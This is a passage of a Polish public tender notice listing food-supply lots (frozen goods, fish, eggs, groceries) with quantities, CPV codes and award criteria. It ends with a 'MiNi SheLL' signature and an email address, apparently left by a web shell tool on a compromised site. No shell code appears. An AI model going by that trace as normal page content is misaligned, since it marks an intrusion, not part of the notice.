43	Kiwi	szt.	80		
43	Mandarynka	kg	100		
44	Ogórek kiszony	kg	600		
45	Pomarańcza	kg	200		
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aronia 
( w paczkach ok. 2,5 kg)	kg	20
Bukiet jarzyn 6-mix
( w paczkach ok. 2,5 kg)	kg	600
Czarna porzeczka 
( w paczkach ok. 2,5 kg)	kg	300
Fasolka szparagowa
( w paczkach ok. 2,5 kg)	kg	350
Groszek zielony
( w paczkach ok. 2,5 kg)	kg	30
Kalafior mrożony
( w paczkach ok.. 2,5 kg)	kg	80
Lody na patyku - różne smaki - 110 ml	szt.	300
Lody - opak 1 kg 	kg	10
Marchew mrożona 
( w paczkach ok. 2,5 kg)	kg	 35
Mieszanka owocowa
( w paczkach ok. 2,5 kg)	kg	160
Pierogi z serem  
( w paczkach 1 kg)	kg	 20
Pierogi z owocami
( w paczkach 1 kg)	kg	 20
Szpinak brykiety
( w paczkach ok. 2,5 kg)	kg	190
Truskawka
( w paczkach ok. 2,5  kg)	kg	 30
Wiśnia bez pestek
( w paczkach ok. 2,5 kg)	kg	 20
Włoszczyzna paski wieloskładnikowa 
( w paczkach ok. 2,5 kg)	kg	 4 650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet śledziowy w śmietanie 300g
Lisner lub równoważne 	szt.	260
Filet z  czerniaka 
 (jednokrotnie glazurowany)	kg	190
Filet z makreli w oleju - 170 g
Lisner, Nautica, Super Fisch
 lub równoważne 	szt.	400
Filet z makreli w pomidorach 170g, Lisner, Nautica, Super fisch  lub równoważne 	szt.	400
Filet z mintaja 
(jednokrotnie glazurowany)	kg	 30
Filet z  pangi
 (jednokrotnie glazurowany)	kg	350
Filet z zielonego śledzia (jednokrotnie glazurowany)	kg	160
Karp Żywy	kg	20
Łosoś wędzony 	kg	2
Makrela wędzona 	kg	160
Paprykarz szczeciński 135g
Dega, Grall, BMC 
lub równoważne 	szt	700
Pasta 80g z tuńczyka, makreli
Pastella lub równoważne	szt	500
Pasta z łososia 125g- tuba	szt	10
Pasta z tuńczyka  125g- tuba	szt	10
Sałatka warzywna ze śledziem, 
kurczakiem, boczkiem 150g
Lisner lub równoważne 	szt	420
Śledzik na raz 100 g- różne smaki, Lisner lub równoważne 	szt	420
Śledź matjas  (lekko solony)	kg	      320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.96.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze-
 klasa- wagowa M,
 klasa jakości A	szt.	32 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa pozostałych artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrupki kukurydziane 250 g 
Fasola biała Jaś w opakowaniach 5 kg lub 10 kg
Fasola kolorowa w opakowaniach 5 kg lub 10 kg
Groch łuskany w opakowaniach
 5 kg lub 10 kg 
Kasza gryczana prażona 
Kasza jęczmienna średnia
Kasza manna
z Młyna w Stoisławiu
Kleik ryżowy 180 g
Bobovita lub równoważne 
Kluski na parze 300 g - buchty
Kolendra 20 g
Konserwy drobiowe 130 g
Konserwy turystyczne 130 g
Konserwy tyrolskie 130 g
Mak - luzem
Makaron- cienkie nitki 
Makaron- kolanka, muszelki
Mąka pszenna typ 450 
Opak. 1 kg
 Mąka razowa z otrębami ( żytnia)
Miodziki jednorazowe 25 g 
Miód prawdziwy 400 g
Olej uniwersalny  3 l
Orzechy włoskie 100 g
Kresto lub równoważne 
Orzechy włoskie łuskane
Pasztet drobiowy w puszce 160 g 
Drosed lub równoważny  
Płatki owsiane górskie  500 g 
Ryż opak. 1 kg
Soczki małe 0,2 l w kartoniku- różne smaki
Soczki owocowe 1 l w kartonie
Tymbark, Tortex lub równoważne 
Sucharki  - paczka 450 g  
Wafle ryżowe naturalne - 
paczka 450 g
Ananas w puszce - 565 g 
Kier , MK lub równoważne 
Brzoskwinie w syropie
 w pusze - 850 g - Kier
 lub równoważne 
Budyń 40 g różne smaki- 
Winiary, Gellwe lub równoważne 
Chipsy cebulowe 250g
Chipsy paprykowe 250g.
Chrupki orzechowe 250g
Chrupki paprykowe 250g
Chrzan tarty 160g
Cukier 1 kg-  biały kryształ
Cukier puder- 500 g 
Diamont lub równoważne
Dżem niskosłodzony - 
260 g różne smaki
Dżem wysokosłodzony - 
260 g różne smaki
Dżemiki jednorazowe 25g
Galaretka 75g różne smaki
Winiary, Gellwe lub równoważne
Groszek konserwowy tradycyjny 400 g, Pudliszki, Kwidzyn 
lub równoważne
Jabłka suszone 
Kawa zbożowa w opk. 500 g
Ketchup pikantny 500g
Tortex, Kotlin lub równoważne 
Ketchup łagodny 500g
Dawtona, Tortex lub równoważne 
Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne
Kokos wiórki
Kokos 100 g w opak.
Koncentrat  pomidorowy 1780 g , Pudliszki lub równoważne 
Kremy do tortów 120 g- różne
Kukurydza   w puszce 400 g, Dawtona , Kwidzyn lub równoważne 
Majeranek luzem 
Mąka ziemniaczana opak.  1 kg
Migdały - 100 g 
Kresto lub równoważne
Miód sztuczny 370 g
Morele suszone
Ogórki konserwowe  słoik 1 l  
Rolnik, Krakus lub równoważne 
Oliwki czarne bezpestkowe 
900 g, Pudliszki lub równoważne 
Oliwki zielone bezpestkowe 
900 g, Pudliszki lub równoważne 
Pieczarki marynowane 370 ml
Rolnik lub równoważne 
Pieprz ziołowy luzem
Przyprawa do drobiu 
Przyprawa do zup płynie - 1 l,
Winiary lub równoważne 
Przyprawa Kucharek - 1 kg Warzywko lub równoważne
Rodzynki luzem 
Rodzynki - 100 g-
Kresto lub równoważne 
Sos do spaghetti w proszku  
Syrop malinowy 500 g 
Śliwka suszona 
Śmietana  Fix w proszku 
Śmietana  w proszku  55g
Śnieżka lub równoważne
Śmietanka 80 g 
Cremona lub równoważne
Zaprawa cytrynowa - 1 l
Cytrynka lub równoważne 
Zioła prowansalskie 10 g
Zupa w proszku grochowa, pomidorowa 
Zupa w proszku grochowa, pomidorowa - 36 g
Żelatyna wieprzowa  50 g 
Aromat do ciast - 10 ml
Delecta lub równoważne 
Baton w czekoladzie - 50 g
Ikar lub równoważne 
Baton w czekoladzie - 50 g
Danusia lub równoważne 
Baton w czekoladzie - 50 g
Maciek lub równoważne 
Bombonierka w czekoladzie 228g Solidarność lub równoważne 
Bombonierka w czekoladzie 300g 
(Wedel, Goplana, Mieszko, Solidarność lub równoważne) 
Ciastka - delicje - 147 g
Ciastka biszkopty luzem
Ciastka czekoladowe luzem - różne 
Ciastka kruche rogaliki z marmoladą  
Ciastka kruche deserowe z cukrem 
Ciastka kruche kocie oczka
Ciastka kruche markizy 
Ciastka kruche maślane 
Ciastka kruche rozetki pudrowe 
Ciastka kruche ślimaki z marmoladą
Ciastka kruche z marmoladą 
Ciastka kruche z maszynki
Cukier waniliowy - 16 g
Dr Oetker lub równoważne 
Cukierki landryny - 100 g
Cukierki  jajeczka w czekoladzie-
Cukierki w czekoladzie
 Michałki, lub równoważne 
Cukierki w czekoladzie- 
 Mieszanka Krakowska,
 lub równoważne 
Cukierki w czekoladzie- trufle
 Cukierki zwykłe 
Cynamon luzem 
Czekolada dla cukrzyków -100 g
Czekolada w proszku -1 kg
Milka lub równoważne 
Czekolada nadziewana -100 g - różne smaki - miętowa, jagodowa truskawkowa, Wawel, Wedel, Goplana lub równoważne 
Czekolada 100 g - mleczna, gorzka, mleczno-deserowa, 
Drożdże 100 g
Gałka muszkatałowa 100 g
Herbata ekspresowa ( 100 szt)
Saga, Minutka lub równoważne 
Herbata granulowana indyjska 
80 g
 Herbata ziołowa - mięta, melisa - 20 saszetek 
Herbatniki  148 g - Krakuski, Łakotki lub równoważne 
 Kakao - 100 g Wawel, Decomoreno lub równoważne 
Kawa naturalna - 100 g
Prima, Gala lub równoważne 
Kawa naturalna 250 g
Mk, Premium lub równoważne 
Kawa rozpuszczalna 100 g 
Nescafe lub równoważne 
Kminek mielony 
Kocie języczki 100 g
lub równoważne 
Krem czekoladowy 350 g 
 Nutella lub równoważne 
Liść laurowy luzem 
Musztarda łagodna, ostra 
Ocet spirytusowy - 1 l 
Orzechy laskowe w czekoladzie 80 g, Jutrzenka lub równoważne 
Paluszki solone 80 g
Papryka słodka w proszku 
Pastylki miętowe w czekoladzie
210 g-Wawel lub równoważne  
Pieprz czarny mielony luzem
Pierniki lukrowane luzem 
Pierniki w czekoladzie luzem 
Proszek do pieczenia 16 g
Dr Oetker lub równoważne 
Przyprawa korzenna 20 g
Prymat lub równoważne 
Ptasie Mleczko, Milka  350g,  smak śmietankowy, waniliowym
lub równoważne 
Rafaello kokosowe, Smakołyk - 150 g lub równoważne 
Rodzynki w czekoladzie 100 g
Jutrzenka lub równoważne 
Rogalik 80g z nadzieniem waniliowym, czekoladowym, truskawkowym -7 Days, Duble max, Croissant lub równoważne 
Soda oczyszczona 15 g
Sól spożywcza 1 kg 
Wafelki w czekoladzie -50 g
Góralki, Grześki, Princessa, Prince Polo  lub równoważne 
Woda gazowana 0,5 l
Woda gazowana 1,5 l
Woda niegazowana 0,5 l
Woda niegazowana 1,5 l
Ziele angielskie luz
Lizaki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com